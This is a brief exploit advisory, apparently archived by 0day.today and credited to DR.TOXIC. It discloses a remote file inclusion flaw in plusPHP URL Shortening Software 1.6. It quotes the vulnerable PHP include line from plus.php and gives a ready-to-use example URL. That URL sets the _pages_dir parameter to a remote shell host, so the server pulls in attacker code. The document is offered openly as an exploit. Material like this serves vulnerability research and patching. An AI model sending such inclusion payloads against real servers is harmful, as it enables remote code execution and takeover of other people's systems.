id: 3067
date: 05/24/2008
title: plusPHP URL Shortening Software 1.6 Remote File Inclusion Vulnerability
author: DR.TOXIC
cves: 

=======================================================================
plusPHP URL Shortening Software 1.6 Remote File Inclusion Vulnerability
=======================================================================



Title: plusPHP Multi-User Short URL and Statistics (plus.php) RFI Vulnerability
Vulnerability Code: (plus.php) "include ($_pages_dir.'_config.php');"
Example;
http://localhost/plus.php?_pages_dir=http://SH3LL?




#  0day.today [2023-03-23]  #